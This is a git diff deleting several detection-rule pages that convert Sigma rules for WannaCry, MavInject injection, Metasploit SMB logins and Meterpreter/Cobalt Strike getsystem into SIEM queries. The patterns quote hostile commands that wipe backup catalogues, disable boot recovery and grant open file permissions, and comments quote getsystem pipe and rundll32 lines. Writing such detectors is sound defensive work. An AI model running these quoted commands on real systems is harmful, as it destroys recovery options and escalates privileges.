-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\tasksche.exe" -or $_.message -match "Image.*.*\\mssecsvc.exe" -or $_.message -match "Image.*.*\\taskdl.exe" -or $_.message -match "Image.*.*\\@WanaDecryptor@.*" -or $_.message -match "Image.*.*\\WanaDecryptor.*" -or $_.message -match "Image.*.*\\taskhsvc.exe" -or $_.message -match "Image.*.*\\taskse.exe" -or $_.message -match "Image.*.*\\111.exe" -or $_.message -match "Image.*.*\\lhdfrgui.exe" -or $_.message -match "Image.*.*\\diskpart.exe" -or $_.message -match "Image.*.*\\linuxnew.exe" -or $_.message -match "Image.*.*\\wannacry.exe") -or ($_.message -match "CommandLine.*.*icacls .* /grant Everyone:F /T /C /Q.*" -or $_.message -match "CommandLine.*.*bcdedit /set {default} recoveryenabled no.*" -or $_.message -match "CommandLine.*.*wbadmin delete catalog -quiet.*" -or $_.message -match "CommandLine.*.*@Please_Read_Me@.txt.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\tasksche.exe OR *\\mssecsvc.exe OR *\\taskdl.exe OR *\\@WanaDecryptor@* OR *\\WanaDecryptor* OR *\\taskhsvc.exe OR *\\taskse.exe OR *\\111.exe OR *\\lhdfrgui.exe OR *\\diskpart.exe OR *\\linuxnew.exe OR *\\wannacry.exe) OR winlog.event_data.CommandLine.keyword:(*icacls\ *\ \/grant\ Everyone\:F\ \/T\ \/C\ \/Q* OR *bcdedit\ \/set\ \{default\}\ recoveryenabled\ no* OR *wbadmin\ delete\ catalog\ \-quiet* OR *@Please_Read_Me@.txt*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/41d40bff-377a-43e2-8e1b-2e543069e079 <<EOF
-{
-  "metadata": {
-    "title": "WannaCry Ransomware",
-    "description": "Detects WannaCry ransomware activity",
-    "tags": "",
-    "query": "(winlog.event_data.Image.keyword:(*\\\\tasksche.exe OR *\\\\mssecsvc.exe OR *\\\\taskdl.exe OR *\\\\@WanaDecryptor@* OR *\\\\WanaDecryptor* OR *\\\\taskhsvc.exe OR *\\\\taskse.exe OR *\\\\111.exe OR *\\\\lhdfrgui.exe OR *\\\\diskpart.exe OR *\\\\linuxnew.exe OR *\\\\wannacry.exe) OR winlog.event_data.CommandLine.keyword:(*icacls\\ *\\ \\/grant\\ Everyone\\:F\\ \\/T\\ \\/C\\ \\/Q* OR *bcdedit\\ \\/set\\ \\{default\\}\\ recoveryenabled\\ no* OR *wbadmin\\ delete\\ catalog\\ \\-quiet* OR *@Please_Read_Me@.txt*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\tasksche.exe OR *\\\\mssecsvc.exe OR *\\\\taskdl.exe OR *\\\\@WanaDecryptor@* OR *\\\\WanaDecryptor* OR *\\\\taskhsvc.exe OR *\\\\taskse.exe OR *\\\\111.exe OR *\\\\lhdfrgui.exe OR *\\\\diskpart.exe OR *\\\\linuxnew.exe OR *\\\\wannacry.exe) OR winlog.event_data.CommandLine.keyword:(*icacls\\ *\\ \\/grant\\ Everyone\\:F\\ \\/T\\ \\/C\\ \\/Q* OR *bcdedit\\ \\/set\\ \\{default\\}\\ recoveryenabled\\ no* OR *wbadmin\\ delete\\ catalog\\ \\-quiet* OR *@Please_Read_Me@.txt*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WannaCry Ransomware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\tasksche.exe *\\mssecsvc.exe *\\taskdl.exe *\\@WanaDecryptor@* *\\WanaDecryptor* *\\taskhsvc.exe *\\taskse.exe *\\111.exe *\\lhdfrgui.exe *\\diskpart.exe *\\linuxnew.exe *\\wannacry.exe) OR CommandLine.keyword:(*icacls * \/grant Everyone\:F \/T \/C \/Q* *bcdedit \/set \{default\} recoveryenabled no* *wbadmin delete catalog \-quiet* *@Please_Read_Me@.txt*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\tasksche.exe" OR Image="*\\mssecsvc.exe" OR Image="*\\taskdl.exe" OR Image="*\\@WanaDecryptor@*" OR Image="*\\WanaDecryptor*" OR Image="*\\taskhsvc.exe" OR Image="*\\taskse.exe" OR Image="*\\111.exe" OR Image="*\\lhdfrgui.exe" OR Image="*\\diskpart.exe" OR Image="*\\linuxnew.exe" OR Image="*\\wannacry.exe") OR (CommandLine="*icacls * /grant Everyone:F /T /C /Q*" OR CommandLine="*bcdedit /set {default} recoveryenabled no*" OR CommandLine="*wbadmin delete catalog -quiet*" OR CommandLine="*@Please_Read_Me@.txt*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\tasksche.exe", "*\\mssecsvc.exe", "*\\taskdl.exe", "*\\@WanaDecryptor@*", "*\\WanaDecryptor*", "*\\taskhsvc.exe", "*\\taskse.exe", "*\\111.exe", "*\\lhdfrgui.exe", "*\\diskpart.exe", "*\\linuxnew.exe", "*\\wannacry.exe"] OR CommandLine IN ["*icacls * /grant Everyone:F /T /C /Q*", "*bcdedit /set {default} recoveryenabled no*", "*wbadmin delete catalog -quiet*", "*@Please_Read_Me@.txt*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*\tasksche\.exe|.*.*\mssecsvc\.exe|.*.*\taskdl\.exe|.*.*\@WanaDecryptor@.*|.*.*\WanaDecryptor.*|.*.*\taskhsvc\.exe|.*.*\taskse\.exe|.*.*\111\.exe|.*.*\lhdfrgui\.exe|.*.*\diskpart\.exe|.*.*\linuxnew\.exe|.*.*\wannacry\.exe)|.*(?:.*.*icacls .* /grant Everyone:F /T /C /Q.*|.*.*bcdedit /set \{default\} recoveryenabled no.*|.*.*wbadmin delete catalog -quiet.*|.*.*@Please_Read_Me@\.txt.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mavinject_proc_inj.md b/Atomic_Threat_Coverage/Detection_Rules/win_mavinject_proc_inj.md
deleted file mode 100644
index 134e14d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mavinject_proc_inj.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | MavInject Process Injection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects process injection using the signed Windows tool Mavinject32.exe |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/gN3mes1s/status/941315826107510784](https://twitter.com/gN3mes1s/status/941315826107510784)</li><li>[https://reaqta.com/2017/12/mavinject-microsoft-injector/](https://reaqta.com/2017/12/mavinject-microsoft-injector/)</li><li>[https://twitter.com/Hexacorn/status/776122138063409152](https://twitter.com/Hexacorn/status/776122138063409152)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MavInject Process Injection
-id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
-status: experimental
-description: Detects process injection using the signed Windows tool Mavinject32.exe
-references:
-    - https://twitter.com/gN3mes1s/status/941315826107510784
-    - https://reaqta.com/2017/12/mavinject-microsoft-injector/
-    - https://twitter.com/Hexacorn/status/776122138063409152
-author: Florian Roth
-date: 2018/12/12
-tags:
-    - attack.t1055
-    - attack.t1218
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '* /INJECTRUNNING *'
-    condition: selection
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.* /INJECTRUNNING .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\ \/INJECTRUNNING\ *
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/17eb8e57-9983-420d-ad8a-2c4976c22eb8 <<EOF
-{
-  "metadata": {
-    "title": "MavInject Process Injection",
-    "description": "Detects process injection using the signed Windows tool Mavinject32.exe",
-    "tags": [
-      "attack.t1055",
-      "attack.t1218"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\ \\/INJECTRUNNING\\ *"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\ \\/INJECTRUNNING\\ *",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MavInject Process Injection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:* \/INJECTRUNNING *
-```
-
-
-### splunk
-    
-```
-CommandLine="* /INJECTRUNNING *"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="* /INJECTRUNNING *")
-```
-
-
-### grep
-    
-```
-grep -P '^.* /INJECTRUNNING .*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_metasploit_authentication.md b/Atomic_Threat_Coverage/Detection_Rules/win_metasploit_authentication.md
deleted file mode 100644
index b2219ef..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_metasploit_authentication.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Metasploit SMB Authentication       |
-|:-------------------------|:------------------|
-| **Description**          | Alerts on Metasploit host's authentications on the domain. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1110: Brute Force](https://attack.mitre.org/techniques/T1110)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Linux hostnames composed of 16 characters.</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[h](h)</li><li>[t](t)</li><li>[t](t)</li><li>[p](p)</li><li>[s](s)</li><li>[:](:)</li><li>[/](/)</li><li>[/](/)</li><li>[g](g)</li><li>[i](i)</li><li>[t](t)</li><li>[h](h)</li><li>[u](u)</li><li>[b](b)</li><li>[.](.)</li><li>[c](c)</li><li>[o](o)</li><li>[m](m)</li><li>[/](/)</li><li>[r](r)</li><li>[a](a)</li><li>[p](p)</li><li>[i](i)</li><li>[d](d)</li><li>[7](7)</li><li>[/](/)</li><li>[m](m)</li><li>[e](e)</li><li>[t](t)</li><li>[a](a)</li><li>[s](s)</li><li>[p](p)</li><li>[l](l)</li><li>[o](o)</li><li>[i](i)</li><li>[t](t)</li><li>[-](-)</li><li>[f](f)</li><li>[r](r)</li><li>[a](a)</li><li>[m](m)</li><li>[e](e)</li><li>[w](w)</li><li>[o](o)</li><li>[r](r)</li><li>[k](k)</li><li>[/](/)</li><li>[b](b)</li><li>[l](l)</li><li>[o](o)</li><li>[b](b)</li><li>[/](/)</li><li>[m](m)</li><li>[a](a)</li><li>[s](s)</li><li>[t](t)</li><li>[e](e)</li><li>[r](r)</li><li>[/](/)</li><li>[l](l)</li><li>[i](i)</li><li>[b](b)</li><li>[/](/)</li><li>[r](r)</li><li>[e](e)</li><li>[x](x)</li><li>[/](/)</li><li>[p](p)</li><li>[r](r)</li><li>[o](o)</li><li>[t](t)</li><li>[o](o)</li><li>[/](/)</li><li>[s](s)</li><li>[m](m)</li><li>[b](b)</li><li>[/](/)</li><li>[c](c)</li><li>[l](l)</li><li>[i](i)</li><li>[e](e)</li><li>[n](n)</li><li>[t](t)</li><li>[.](.)</li><li>[r](r)</li><li>[b](b)</li></ul>  |
-| **Author**               | Chakib Gzenayi (@Chak092), Hosni Mribah |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Metasploit SMB Authentication
-description: Alerts on Metasploit host's authentications on the domain.
-id: 72124974-a68b-4366-b990-d30e0b2a190d
-author: Chakib Gzenayi (@Chak092), Hosni Mribah
-date: 2020/05/06
-references: https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/smb/client.rb
-tags:
-    - attack.credential_access
-    - attack.t1110
-logsource:
-    product: windows
-    service: security
-detection:
-    selection1:
-        EventID:
-        - 4625
-        - 4624
-        LogonType: 3
-        AuthenticationPackage: 'NTLM'
-        WorkstationName|re: '^[A-Za-z0-9]{16}$'
-    selection2:
-        ProcessName:
-        EventID: 4776
-        SourceWorkstation|re: '^[A-Za-z0-9]{16}$'
-    condition: selection1 OR selection2
-falsepositives:
-    - Linux hostnames composed of 16 characters.
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_metasploit_authentication.yml): Backend does not support map values of type <class 'sigma.parser.modifiers.type.SigmaRegularExpressionModifier'>
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((winlog.event_id:("4625" OR "4624") AND winlog.event_data.LogonType:"3" AND AuthenticationPackage:"NTLM" AND winlog.event_data.WorkstationName:/^[A-Za-z0-9]{16}$/) OR (NOT _exists_:winlog.event_data.ProcessName AND winlog.event_id:"4776" AND SourceWorkstation:/^[A-Za-z0-9]{16}$/)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/72124974-a68b-4366-b990-d30e0b2a190d <<EOF
-{
-  "metadata": {
-    "title": "Metasploit SMB Authentication",
-    "description": "Alerts on Metasploit host's authentications on the domain.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1110"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:(\"4625\" OR \"4624\") AND winlog.event_data.LogonType:\"3\" AND AuthenticationPackage:\"NTLM\" AND winlog.event_data.WorkstationName:/^[A-Za-z0-9]{16}$/) OR (NOT _exists_:winlog.event_data.ProcessName AND winlog.event_id:\"4776\" AND SourceWorkstation:/^[A-Za-z0-9]{16}$/)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:(\"4625\" OR \"4624\") AND winlog.event_data.LogonType:\"3\" AND AuthenticationPackage:\"NTLM\" AND winlog.event_data.WorkstationName:/^[A-Za-z0-9]{16}$/) OR (NOT _exists_:winlog.event_data.ProcessName AND winlog.event_id:\"4776\" AND SourceWorkstation:/^[A-Za-z0-9]{16}$/)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Metasploit SMB Authentication'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:("4625" "4624") AND LogonType:"3" AND AuthenticationPackage:"NTLM" AND WorkstationName:/^[A-Za-z0-9]{16}$/) OR (NOT _exists_:ProcessName AND EventID:"4776" AND SourceWorkstation:/^[A-Za-z0-9]{16}$/))
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_metasploit_authentication.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_metasploit_authentication.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_metasploit_authentication.yml): Node type not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_installation.md b/Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_installation.md
deleted file mode 100644
index 825e5e8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_meterpreter_or_cobaltstrike_getsystem_service_installation.md
+++ /dev/null
@@ -1,375 +0,0 @@
-| Title                    | Meterpreter or Cobalt Strike Getsystem Service Installation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1134: Access Token Manipulation](https://attack.mitre.org/techniques/T1134)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Highly unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li><li>[https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/](https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, Ecco |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Meterpreter or Cobalt Strike Getsystem Service Installation
-id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6
-description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
-author: Teymur Kheirkhabarov, Ecco
-date: 2019/10/26
-modified: 2020/05/15
-references:
-    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
-    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
-tags:
-    - attack.privilege_escalation
-    - attack.t1134
-detection:
-    selection_1:
-        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
-        - ServiceFileName|contains|all:
-            - 'cmd'
-            - '/c'
-            - 'echo'
-            - '\pipe\'
-        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
-        - ServiceFileName|contains|all:
-            - '%COMSPEC%'
-            - '/c'
-            - 'echo'
-            - '\pipe\'
-        # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
-        - ServiceFileName|contains|all:
-            - 'rundll32'
-            - '.dll,a'
-            - '/p:'
-    condition: selection and selection_1
-fields:
-    - ComputerName
-    - SubjectDomainName
-    - SubjectUserName
-    - ServiceFileName
-falsepositives:
-    - Highly unlikely
-level: critical
----
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 6
----
- logsource:
-     product: windows
-     service: security
- detection:
-     selection:
-         EventID: 4697
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and (($_.message -match "ServiceFileName.*.*cmd.*" -and $_.message -match "ServiceFileName.*.*/c.*" -and $_.message -match "ServiceFileName.*.*echo.*" -and $_.message -match "ServiceFileName.*.*\\pipe\\.*") -or ($_.message -match "ServiceFileName.*.*%COMSPEC%.*" -and $_.message -match "ServiceFileName.*.*/c.*" -and $_.message -match "ServiceFileName.*.*echo.*" -and $_.message -match "ServiceFileName.*.*\\pipe\\.*") -or ($_.message -match "ServiceFileName.*.*rundll32.*" -and $_.message -match "ServiceFileName.*.*.dll,a.*" -and $_.message -match "ServiceFileName.*.*/p:.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "6" -and (($_.message -match "ServiceFileName.*.*cmd.*" -and $_.message -match "ServiceFileName.*.*/c.*" -and $_.message -match "ServiceFileName.*.*echo.*" -and $_.message -match "ServiceFileName.*.*\\pipe\\.*") -or ($_.message -match "ServiceFileName.*.*%COMSPEC%.*" -and $_.message -match "ServiceFileName.*.*/c.*" -and $_.message -match "ServiceFileName.*.*echo.*" -and $_.message -match "ServiceFileName.*.*\\pipe\\.*") -or ($_.message -match "ServiceFileName.*.*rundll32.*" -and $_.message -match "ServiceFileName.*.*.dll,a.*" -and $_.message -match "ServiceFileName.*.*/p:.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Security | where {($_.ID -eq "4697" -and (($_.message -match "ServiceFileName.*.*cmd.*" -and $_.message -match "ServiceFileName.*.*/c.*" -and $_.message -match "ServiceFileName.*.*echo.*" -and $_.message -match "ServiceFileName.*.*\\pipe\\.*") -or ($_.message -match "ServiceFileName.*.*%COMSPEC%.*" -and $_.message -match "ServiceFileName.*.*/c.*" -and $_.message -match "ServiceFileName.*.*echo.*" -and $_.message -match "ServiceFileName.*.*\\pipe\\.*") -or ($_.message -match "ServiceFileName.*.*rundll32.*" -and $_.message -match "ServiceFileName.*.*.dll,a.*" -and $_.message -match "ServiceFileName.*.*/p:.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\pipe\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\pipe\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\/p\:*)))
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"6" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\pipe\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\pipe\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\/p\:*)))
-(winlog.channel:"Security" AND winlog.event_id:"4697" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\pipe\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\pipe\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\/p\:*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/843544a7-56e0-4dcc-a44f-5cc266dd97d6 <<EOF
-{
-  "metadata": {
-    "title": "Meterpreter or Cobalt Strike Getsystem Service Installation",
-    "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1134"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\\/p\\:*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND ((winlog.event_data.ServiceFileName.keyword:*cmd* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*%COMSPEC%* AND winlog.event_data.ServiceFileName.keyword:*\\/c* AND winlog.event_data.ServiceFileName.keyword:*echo* AND winlog.event_data.ServiceFileName.keyword:*\\\\pipe\\\\*) OR (winlog.event_data.ServiceFileName.keyword:*rundll32* AND winlog.event_data.ServiceFileName.keyword:*.dll,a* AND winlog.event_data.ServiceFileName.keyword:*\\/p\\:*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
